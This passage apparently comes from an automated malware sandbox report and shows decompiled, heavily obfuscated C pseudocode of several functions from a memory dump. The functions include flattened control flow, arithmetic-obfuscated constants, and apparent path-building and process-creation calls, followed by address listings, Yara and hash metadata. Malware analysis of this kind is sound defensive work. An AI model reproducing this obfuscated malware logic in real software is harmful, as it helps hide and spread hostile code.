				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E006D889D(0x6dc930, _v1076, __eflags);
								_t368 =  *0x6dca2c; // 0x248300
								__eflags = _t368 + 0x230;
								_t419 =  *0x6dca2c; // 0x248300
								E006C29E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E006D2025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x6dca2c; // 0x248300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E006CC6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E006C65A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E006D0ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E006C1AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E006D889D(0x6dc9d0, _v1184, _t440);
													_pop(_t405);
													E006D3EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x6dc9d0, _v1124, _v1208, 0x6dc9d0, _v1164, 0x6dc9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E006D2025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}





































































                                          0x006c6d9f
                                          0x006c6da5
                                          0x006c6db2
                                          0x006c6dbb
                                          0x006c6dc3
                                          0x006c6dcb
                                          0x006c6dd0
                                          0x006c6dd8
                                          0x006c6de0
                                          0x006c6de5
                                          0x006c6ded
                                          0x006c6df5
                                          0x006c6dfd
                                          0x006c6e05
                                          0x006c6e0d
                                          0x006c6e19
                                          0x006c6e20
                                          0x006c6e2b
                                          0x006c6e30
                                          0x006c6e36
                                          0x006c6e3e
                                          0x006c6e46
                                          0x006c6e59
                                          0x006c6e5a
                                          0x006c6e61
                                          0x006c6e6c
                                          0x006c6e74
                                          0x006c6e79
                                          0x006c6e7e
                                          0x006c6e86
                                          0x006c6e8e
                                          0x006c6e96
                                          0x006c6e9e
                                          0x006c6ea6
                                          0x006c6eae
                                          0x006c6eb9
                                          0x006c6ec4
                                          0x006c6ecf
                                          0x006c6ed7
                                          0x006c6ee1
                                          0x006c6ee5
                                          0x006c6eed
                                          0x006c6ef5
                                          0x006c6efa
                                          0x006c6f02
                                          0x006c6f07
                                          0x006c6f0f
                                          0x006c6f1a
                                          0x006c6f25
                                          0x006c6f30
                                          0x006c6f38
                                          0x006c6f40
                                          0x006c6f45
                                          0x006c6f4d
                                          0x006c6f58
                                          0x006c6f63
                                          0x006c6f6e
                                          0x006c6f79
                                          0x006c6f84
                                          0x006c6f8f
                                          0x006c6fa3
                                          0x006c6faa
                                          0x006c6fb5
                                          0x006c6fbd
                                          0x006c6fc5
                                          0x006c6fca
                                          0x006c6fd2
                                          0x006c6fda
                                          0x006c6fe4
                                          0x006c6ff2
                                          0x006c6ff7
                                          0x006c6ffd
                                          0x006c7005
                                          0x006c700d
                                          0x006c7015
                                          0x006c701a
                                          0x006c7022
                                          0x006c702a
                                          0x006c7032
                                          0x006c703a
                                          0x006c703f
                                          0x006c7047
                                          0x006c704f
                                          0x006c705a
                                          0x006c7062
                                          0x006c706d
                                          0x006c7078
                                          0x006c7083
                                          0x006c708e
                                          0x006c7096
                                          0x006c709b
                                          0x006c70a3
                                          0x006c70ab
                                          0x006c70b3
                                          0x006c70bb
                                          0x006c70c3
                                          0x006c70cb
                                          0x006c70d8
                                          0x006c70db
                                          0x006c70df
                                          0x006c70e4
                                          0x006c70ec
                                          0x006c70f4
                                          0x006c70fc
                                          0x006c7104
                                          0x006c710c
                                          0x006c7114
                                          0x006c711f
                                          0x006c7127
                                          0x006c7132
                                          0x006c713a
                                          0x006c7142
                                          0x006c714a
                                          0x006c7152
                                          0x006c715a
                                          0x006c715f
                                          0x006c7167
                                          0x006c716c
                                          0x006c7174
                                          0x006c717c
                                          0x006c7184
                                          0x006c7189
                                          0x006c7191
                                          0x006c71a7
                                          0x006c71ae
                                          0x006c71b9
                                          0x006c71c1
                                          0x006c71c6
                                          0x006c71ce
                                          0x006c71d6
                                          0x006c71e2
                                          0x006c71e5
                                          0x006c71e9
                                          0x006c71ee
                                          0x006c71f6
                                          0x006c71fe
                                          0x006c720b
                                          0x006c7210
                                          0x006c7218
                                          0x006c7220
                                          0x006c722b
                                          0x006c7236
                                          0x006c7241
                                          0x006c7249
                                          0x006c724e
                                          0x006c7253
                                          0x006c725b
                                          0x006c7263
                                          0x006c7268
                                          0x006c7270
                                          0x006c7278
                                          0x006c7280
                                          0x006c7285
                                          0x006c728a
                                          0x006c7292
                                          0x006c7299
                                          0x006c72a1
                                          0x006c72a9
                                          0x006c72b1
                                          0x006c72b9
                                          0x006c72c4
                                          0x006c72cf
                                          0x006c72da
                                          0x006c72e2
                                          0x006c72e7
                                          0x006c72ec
                                          0x006c72f4
                                          0x006c72fc
                                          0x006c72fc
                                          0x006c72fe
                                          0x006c72ff
                                          0x006c72ff
                                          0x006c72ff
                                          0x006c7304
                                          0x006c7304
                                          0x006c730a
                                          0x006c7487
                                          0x006c7497
                                          0x006c74bb
                                          0x006c74c0
                                          0x006c74d5
                                          0x006c74e1
                                          0x006c74f7
                                          0x006c74fc
                                          0x006c74ff
                                          0x00000000
                                          0x006c7310
                                          0x006c7316
                                          0x006c7467
                                          0x006c746d
                                          0x006c7478
                                          0x006c7478
                                          0x006c747b
                                          0x00000000
                                          0x00000000
                                          0x006c7475
                                          0x006c7475
                                          0x006c7475
                                          0x006c747d
                                          0x006c7480
                                          0x00000000
                                          0x006c731c
                                          0x006c7322
                                          0x006c7433
                                          0x006c7434
                                          0x006c7455
                                          0x006c745a
                                          0x006c745d
                                          0x00000000
                                          0x006c7328
                                          0x006c732e
                                          0x006c7537
                                          0x006c7334
                                          0x006c7336
                                          0x006c73d6
                                          0x006c73db
                                          0x006c7413
                                          0x006c741a
                                          0x006c741d
                                          0x006c741f
                                          0x006c7427
                                          0x006c72fc
                                          0x006c72fc
                                          0x006c72fe
                                          0x006c72ff
                                          0x006c72ff
                                          0x00000000
                                          0x006c72ff
                                          0x006c733c
                                          0x006c733c
                                          0x006c733e
                                          0x006c7344
                                          0x006c7351
                                          0x006c7356
                                          0x006c7392
                                          0x006c73b4
                                          0x006c73b7
                                          0x006c73bc
                                          0x006c7504
                                          0x006c7506
                                          0x006c750b
                                          0x006c750b
                                          0x00000000
                                          0x006c733e
                                          0x006c7336
                                          0x006c732e
                                          0x006c7322
                                          0x006c7316
                                          0x006c753f
                                          0x006c7550
                                          0x006c750c
                                          0x006c750c
                                          0x00000000
                                          0x006c7518
                                          0x006c72ff

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                          • API String ID: 1514166925-3192994148
                                          • Opcode ID: 617dfba3fe9edc66024e642cd308fa61ae0c93a83c0ca6495c5f99915abad132
                                          • Instruction ID: 0bed8e3ee2524815b5e3d0a23703d21d2b0c54ad2d76da0da65ca1244418c4d0
                                          • Opcode Fuzzy Hash: 617dfba3fe9edc66024e642cd308fa61ae0c93a83c0ca6495c5f99915abad132
                                          • Instruction Fuzzy Hash: 3E0214725097819FE3A5CF61C84AA5BBBE2FBC5748F10890DF1D9862A0D7B58909CF07
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CBB3A, Relevance: 14.0, Strings: 11, Instructions: 273COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006CBB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E006C602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E006C2833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E006D337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E006D93A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E006D889D(0x6dc000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E006C7AB1(_v168, _a16, 0x6dc000, 0x6dc000, _v152 | _v176, _v100, 0x6dc000, 0x6dc000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E006D2025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}















































                                          0x006cbb44
                                          0x006cbb4d
                                          0x006cbb4e
                                          0x006cbb55
                                          0x006cbb5c
                                          0x006cbb63
                                          0x006cbb6a
                                          0x006cbb6b
                                          0x006cbb6c
                                          0x006cbb6d
                                          0x006cbb72
                                          0x006cbb79
                                          0x006cbb7b
                                          0x006cbb83
                                          0x006cbb86
                                          0x006cbb92
                                          0x006cbb99
                                          0x006cbb9c
                                          0x006cbba0
                                          0x006cbba8
                                          0x006cbbb0
                                          0x006cbbb8
                                          0x006cbbc0
                                          0x006cbbc5
                                          0x006cbbcd
                                          0x006cbbd5
                                          0x006cbbdd
                                          0x006cbbe2
                                          0x006cbbea
                                          0x006cbbf2
                                          0x006cbbfa
                                          0x006cbc02
                                          0x006cbc0a
                                          0x006cbc12
                                          0x006cbc17
                                          0x006cbc1c
                                          0x006cbc24
                                          0x006cbc2c
                                          0x006cbc34
                                          0x006cbc44
                                          0x006cbc48
                                          0x006cbc50
                                          0x006cbc58
                                          0x006cbc60
                                          0x006cbc68
                                          0x006cbc70
                                          0x006cbc7d
                                          0x006cbc80
                                          0x006cbc8c
                                          0x006cbc90
                                          0x006cbc98
                                          0x006cbcab
                                          0x006cbcac
                                          0x006cbcb3
                                          0x006cbcbe
                                          0x006cbcc6
                                          0x006cbcd1
                                          0x006cbcd5
                                          0x006cbcdd
                                          0x006cbce5
                                          0x006cbced
                                          0x006cbcf2
                                          0x006cbcfc
                                          0x006cbd04
                                          0x006cbd08
                                          0x006cbd17
                                          0x006cbd1a
                                          0x006cbd1e
                                          0x006cbd26
                                          0x006cbd2e
                                          0x006cbd36
                                          0x006cbd3e
                                          0x006cbd43
                                          0x006cbd47
                                          0x006cbd4f
                                          0x006cbd57
                                          0x006cbd61
                                          0x006cbd65
                                          0x006cbd6d
                                          0x006cbd78
                                          0x006cbd83
                                          0x006cbd8e
                                          0x006cbd96
                                          0x006cbd9b
                                          0x006cbda3
                                          0x006cbdab
                                          0x006cbdb3
                                          0x006cbdc0
                                          0x006cbdc4
                                          0x006cbdc9
                                          0x006cbdd1
                                          0x006cbdd9
                                          0x006cbde1
                                          0x006cbde6
                                          0x006cbdee
                                          0x006cbdf6
                                          0x006cbe03
                                          0x006cbe0f
                                          0x006cbe13
                                          0x006cbe1b
                                          0x006cbe23
                                          0x006cbe28
                                          0x006cbe30
                                          0x006cbe38
                                          0x006cbe44
                                          0x006cbe49
                                          0x006cbe4f
                                          0x006cbe57
                                          0x006cbe5f
                                          0x006cbe67
                                          0x006cbe6f
                                          0x006cbe77
                                          0x006cbe7f
                                          0x006cbe87
                                          0x006cbe8f
                                          0x006cbe97
                                          0x006cbe9f
                                          0x006cbea4
                                          0x006cbeaa
                                          0x006cbeb2
                                          0x006cbeba
                                          0x006cbec6
                                          0x006cbec9
                                          0x006cbed2
                                          0x006cbedf
                                          0x006cbeec
                                          0x006cbef4
                                          0x006cbefc
                                          0x006cbf04
                                          0x006cbf0c
                                          0x006cbf11
                                          0x006cbf19
                                          0x006cbf21
                                          0x006cbf29
                                          0x006cbf31
                                          0x006cbf39
                                          0x006cbf3e
                                          0x006cbf46
                                          0x006cbf53
                                          0x006cbf57
                                          0x006cbf5f
                                          0x006cbf5f
                                          0x006cbf65
                                          0x006cbf9e
                                          0x006cbfa3
                                          0x006cbfa6
                                          0x006cbfa8
                                          0x006cbfae
                                          0x00000000
                                          0x006cbfae
                                          0x006cbf67
                                          0x006cbf69
                                          0x006cc0b1
                                          0x006cbf6f
                                          0x006cbf75
                                          0x00000000
                                          0x006cbf7b
                                          0x006cbf7b
                                          0x00000000
                                          0x006cbf7b
                                          0x006cbf75
                                          0x006cbf69
                                          0x006cc0ba
                                          0x006cc0c5
                                          0x006cc0c5
                                          0x006cbfcf
                                          0x006cbfd4
                                          0x006cbfe1
                                          0x006cbff4
                                          0x006cc054
                                          0x006cc06b
                                          0x006cc082
                                          0x006cc087
                                          0x006cc08a
                                          0x006cc08c
                                          0x006cc08c
                                          0x006cc08c
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                          • API String ID: 0-3778435269
                                          • Opcode ID: 55ebb3b9baa24caffefcede93f45f3b0479c54256cd31112cf568793c1d9f504
                                          • Instruction ID: 423c1d9d319408e22baa3363abae5c93fea41e97c3493c6a39663836240cb43a
                                          • Opcode Fuzzy Hash: 55ebb3b9baa24caffefcede93f45f3b0479c54256cd31112cf568793c1d9f504
                                          • Instruction Fuzzy Hash: 28D100715083819FE364CF65C889A5FFBE2BBC4358F10891DF29A96260D7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D8F49, Relevance: 12.7, Strings: 10, Instructions: 223COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006D8F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
